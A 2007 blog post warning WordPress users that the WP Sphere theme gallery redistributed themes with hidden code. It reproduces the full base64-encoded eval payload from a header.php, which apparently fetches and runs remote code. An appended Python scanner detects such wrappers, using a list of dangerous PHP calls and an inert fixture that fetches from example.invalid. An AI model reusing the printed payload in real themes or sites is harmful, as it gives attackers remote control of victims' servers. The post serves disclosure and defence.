Do not download WordPress themes distributed by 3rd party sites

  • November 25th, 2007

Warning for new and existing WordPress users: DO NOT download WordPress themes from 3rd party "galleries". Identify the original source of the theme and download it directly from the author's website.

As WordPress – both hosted and self-hosted – continues to enjoy explosive growth, exposure to malicious activity and code will increase. Sadly, this applies to both website administrators and visitors. In August I was disappointed to discover that WordPress and Joomla themes were being redistributed with malicious code; code which would track your own visitors or allow for random ads to be served. Since being exposed, the offending website has been taken down. Unfortunately, similar theme galleries have appeared with the same intent to redistribute themes with malicious code.

WP Sphere is distributing WordPress themes with malicious code

Alistair recently tipped me off to another WordPress gallery distributing themes which include malicious code / modifications. The tip from Alistair actually began as a support email:

I have one question about the encoded stuff I saw in the header, […]

@eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3Q\
jY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i\
LCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiw\
gJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICR\
SNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3I\
iOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMD\
kxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMk\
QwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1Qj\
M5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRj\
EyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNT\
BGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIj\
sgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OT\
cgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3OD\
M2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJF\
JEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5NiA9ICIxIjsgIC\
RSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cD\
ovL3d3dy4kUjUwRjVGOUM4MEYxMkZGQUU4QjI0MDA1MjhFODFCMzRFLm\
NvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waH\
A/dXJsPSIuIHVybGVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXS\
kgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0\
hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRT\
kwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNj\
U2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOU\
I3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQT\
gwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMz\
M1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3d3LiRSNT\
BGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRk\
U5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gdX\
JsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG\
9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKTsgIE\
ByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMT\
E1KTsgfSBmY2xvc2UoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQk\
MzMDkxNik7'));

After kindly informing Alistair that my theme(s) were not distributed with any code outside of the WordPress scope, I discovered that the code in question was downloaded from WP Sphere. Poking through some of the other recognized themes on the site, I discovered that each of the themes made available for download had been repackaged to include the code above – often in plain view within the header.php file. Paul Carroll took the time to break down what the code above exposes users to.

I think the potential for abuse of this script is huge. I see it as a covert channel to set up WordPress enabled sites as thin zombies. The code being sent back to the server and eval’d could be a mailing script for spam or phishing.

If you have downloaded themes from WP Sphere or any other WordPress themes gallery, exercise caution and inspect the source code. If you are not code proficient, identify the original author and download the theme directly.
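For readers who do want to inspect a downloaded theme, here is a small scanner (added example, not code from the original post or from 5ThirtyOne) that finds the eval(base64_decode('...')) wrapper shown above, decodes the hidden string even when it is wrapped across lines with trailing backslashes, and reports which PHP calls and hostnames appear inside it. The fixture header is constructed for the example and decodes to an inert stub pointing at example.invalid.

```python
import base64
import re
from pathlib import Path

# Wrapper as it appeared in the repackaged header.php: optional '@' suppression and a
# quoted base64 string, possibly wrapped across lines with trailing backslashes.
WRAPPER_RE = re.compile(
    r"@?eval\s*\(\s*@?base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s\\]+)\1\s*\)\s*\)",
    re.IGNORECASE,
)

# PHP calls whose presence inside a hidden payload warrants a human look.
SUSPICIOUS_CALLS = ("fsockopen", "file_get_contents", "readfile", "eval",
                    "curl_exec", "system", "shell_exec", "passthru")

def decode_payload(blob: str) -> str:
    """Drop line-wrapping (whitespace, backslashes), repair padding, decode to text."""
    compact = re.sub(r"[\s\\]", "", blob)
    compact += "=" * (-len(compact) % 4)
    return base64.b64decode(compact).decode("utf-8", errors="replace")

def scan_source(src: str) -> list:
    """One finding per eval(base64_decode(...)) wrapper found in a PHP source string."""
    findings = []
    for m in WRAPPER_RE.finditer(src):
        decoded = decode_payload(m.group(2))
        calls = [c for c in SUSPICIOUS_CALLS if re.search(rf"\b{c}\s*\(", decoded)]
        hosts = sorted(set(re.findall(r'"((?:[\w-]+\.)+[a-z]{2,})"', decoded)))
        findings.append({"line": src.count("\n", 0, m.start()) + 1,
                         "calls": calls, "hosts": hosts, "decoded": decoded})
    return findings

def scan_theme(theme_dir: Path) -> dict:
    """Scan every .php file under a theme directory; only files with findings are listed."""
    report = {}
    for path in sorted(theme_dir.rglob("*.php")):
        found = scan_source(path.read_text(errors="replace"))
        if found:
            report[str(path)] = found
    return report

# Constructed fixture (not the real payload): an inert stub with the same shape
# (connect out, fetch, eval), wrapped with trailing backslashes like the gallery's copy.
_INNER = b'if(@fsockopen("example.invalid", 80)) @eval(@file_get_contents("http://example.invalid/w1.php"));'
_B64 = base64.b64encode(_INNER).decode()
SAMPLE_HEADER = "<?php\n@eval(@base64_decode('" + "\\\n".join(
    _B64[i:i + 40] for i in range(0, len(_B64), 40)) + "'));\n?>\n<!DOCTYPE html>\n"
```

Call scan_source(SAMPLE_HEADER) to see the fixture flagged on line 2 with fsockopen, file_get_contents and eval, or scan_theme(Path("wp-content/themes/some-theme")) against a theme you have downloaded; anything it reports should be compared against the author's original copy before the theme is activated.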

How do you police a non-policed platform?

The growth of a platform increases the virtual bull's-eye for malicious individuals to target. How do you protect WordPress users from download sites like WP Sphere or Template Browser? Alistair pointed out that WP Sphere was targeting users by purchasing Google AdWords to increase the likelihood of attracting organic search engine traffic. How do you fight against such websites?

Only download 5ThirtyOne themes from 5thirtyone.com

I invite WordPress theme authors to make the same recommendation for their visitors – do not download themes from websites other than your own. Additionally, if you are a theme author and discover work being redistributed [without permission] with or without malicious code, contact the offending website host to request that content be taken down.

Unless a 5ThirtyOne theme was officially converted for use on a blogging platform other than WordPress, please download themes from nowhere other than the links below:

If you’ve recommended WordPress to friends and family, please take the time to check on them or inform them of the dangers of downloading from free theme galleries.